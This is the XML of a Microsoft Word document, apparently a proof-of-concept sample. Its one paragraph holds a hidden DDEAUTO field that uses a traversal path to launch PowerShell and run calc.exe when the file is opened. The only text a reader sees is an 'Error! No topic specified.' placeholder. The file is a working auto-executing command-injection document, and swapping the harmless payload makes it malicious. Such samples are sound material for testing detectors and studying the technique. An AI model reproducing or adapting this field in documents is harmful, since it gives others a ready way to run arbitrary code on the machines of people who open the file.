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F84" w:rsidRDefault="007D24E5">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001449FE">
        <w:instrText xml:space="preserve"> DDEAUTO C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe calc.exe</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="001449FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Error! No topic specified.</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002E6F84" w:rsidSect="006C1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0D5F"/>
    <w:rsid w:val="001449FE"/>
    <w:rsid w:val="002E6F84"/>
    <w:rsid w:val="00620D5F"/>
    <w:rsid w:val="006C1333"/>
    <w:rsid w:val="007D24E5"/>
    <w:rsid w:val="00E33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139</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Grizli777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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-24T08:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-24T08:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>